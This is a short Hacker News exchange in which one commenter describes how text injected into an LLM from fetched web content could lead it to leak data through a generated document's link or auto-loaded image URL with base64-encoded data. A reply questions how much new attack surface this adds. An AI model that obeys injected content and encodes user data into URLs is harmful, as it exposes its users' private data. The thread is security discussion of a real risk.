logoalt Hacker News

Terr_today at 3:58 AM1 replyview on HN

Treating this as being about cloud-storage boundaries is, er, insufficiently paranoid.

Maliciously constructed text that goes into the LLM from basically anywhere (including, say, fetched stats about a competitor's product from their website) is a potential source of prompt-injection.

Once that happens, exfiltration can be as simple as generating a spreadsheet/doc with a link or small auto-loaded image, and an URL that has data base64'ed into it.


Replies

scottyahtoday at 4:18 AM

Or you could just get a hooker to sleep with one of them and plug a USB into their work laptops. I'm not trying to say there's nothing to worry about, but do you really think LLMs present that much larger of an attack surface than exists now?

The work BigIP is doing on LLM traffic analysis is cool though.

show 1 reply